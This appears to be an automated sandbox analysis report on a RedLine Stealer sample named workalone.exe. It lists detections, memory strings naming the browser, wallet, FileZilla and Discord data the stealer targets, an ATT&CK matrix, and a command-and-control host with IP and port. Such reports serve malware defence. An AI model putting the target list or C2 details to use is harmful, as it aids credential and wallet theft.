                    Source: C:\Users\user\Desktop\workalone.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: workalone.exe, 00000001.00000003.372984422.0000000006925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: #l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: #l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		1
                    Valid Accounts                    		1
                    Valid Accounts                    		11
                    Masquerading                    		1
                    OS Credential Dumping                    		231
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Access Token Manipulation                    		1
                    Valid Accounts                    		LSASS Memory11
                    Process Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		Exfiltration Over Bluetooth11
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)111
                    Process Injection                    		1
                    Access Token Manipulation                    		Security Account Manager231
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer22
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script231
                    Virtualization/Sandbox Evasion                    		LSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common111
                    Process Injection                    		Cached Domain Credentials123
                    System Information Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Deobfuscate/Decode Files or Information                    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                    Obfuscated Files or Information                    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)2
                    Software Packing                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 756291 Sample: workalone.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for dropped file 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 9 other signatures 2->48 7 workalone.exe 4 2->7         started        process3 file4 36 C:\Users\user\AppData\...\workalone.exe.log, ASCII 7->36 dropped 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->50 52 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 7->52 54 Injects a PE file into a foreign processes 7->54 11 workalone.exe 15 31 7->11         started        15 cmd.exe 2 7->15         started        17 cmd.exe 3 7->17         started        20 cmd.exe 1 7->20         started        signatures5 process6 dnsIp7 38 saleshor12.duckdns.org 85.208.136.178, 46539, 49685, 49687 CMCSUS Germany 11->38 40 api.ip.sb 11->40 56 Tries to harvest and steal browser information (history, passwords, etc) 11->56 58 Tries to steal Crypto Currency Wallets 11->58 22 conhost.exe 11->22         started        60 Uses schtasks.exe or at.exe to add and modify task schedules 15->60 62 Drops PE files with benign system names 15->62 24 conhost.exe 15->24         started        32 C:\Users\user\AppData\Roaming\...\svchost.exe, PE32 17->32 dropped 34 C:\Users\user\...\svchost.exe:Zone.Identifier, ASCII 17->34 dropped 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 schtasks.exe 1 20->30         started        file8 signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    workalone.exe100%AviraHEUR/AGEN.1235903
                    workalone.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\svchost\svchost.exe100%AviraHEUR/AGEN.1235903
                    C:\Users\user\AppData\Roaming\svchost\svchost.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.0.workalone.exe.590000.0.unpack100%AviraHEUR/AGEN.1235903Download File
                    1.0.workalone.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    api.ip.sb2%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://ns.adobe.cobj0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                    http://tempuri.org/t_0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnviron0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                    http://saleshor12.duckdns.org:465390%Avira URL Cloudsafe
                    http://saleshor12.duckdns.org:46539/0%Avira URL Cloudsafe
                    saleshor12.duckdns.org:465390%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                    http://saleshor12.duckdns.org0%Avira URL Cloudsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                    http://tempuri.org/00%URL Reputationsafe
                    http://ns.ado/10%URL Reputationsafe
                    http://saleshor12.duckdns.org:0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    saleshor12.duckdns.org
                    		85.208.136.178
                    		truetrue
                      		unknown
                      api.ip.sb
                      		unknown
                      		unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://saleshor12.duckdns.org:46539/true
                      • Avira URL Cloud: safe
                      		unknown
                      saleshor12.duckdns.org:46539true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtabworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                          		high
                          https://duckduckgo.com/ac/?q=tmp1B56.tmp.1.drfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                              		high
                              http://ns.adobe.cobjworkalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/Endpoint/CheckConnectResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.datacontract.org/2004/07/workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/Endpoint/EnvironmentSettingsworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/t_workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/soap/envelope/workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://saleshor12.duckdns.org:46539workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://search.yahoo.com?fr=crmas_sfpfworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp1B56.tmp.1.drfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/envelope/Dworkalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://saleshor12.duckdns.orgworkalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://tempuri.org/workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Endpoint/CheckConnectworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                                          		high
                                          http://ns.adobe.c/gworkalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/VerifyUpdateResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironworkalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                                            		high
                                            http://tempuri.org/Endpoint/SetEnvironmentworkalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Endpoint/SetEnvironmentResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Endpoint/GetUpdatesworkalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=tmp1B56.tmp.1.drfalse
                                              		high
                                              https://search.yahoo.com?fr=crmas_sfpworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                                                		high
                                                https://api.ipify.orgcookies//settinString.Removegworkalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2004/08/addressingworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Endpoint/GetUpdatesResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://tempuri.org/Endpoint/EnvironmentSettingsResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://tempuri.org/Endpoint/VerifyUpdateworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://tempuri.org/0workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp1B56.tmp.1.drfalse
                                                        		high
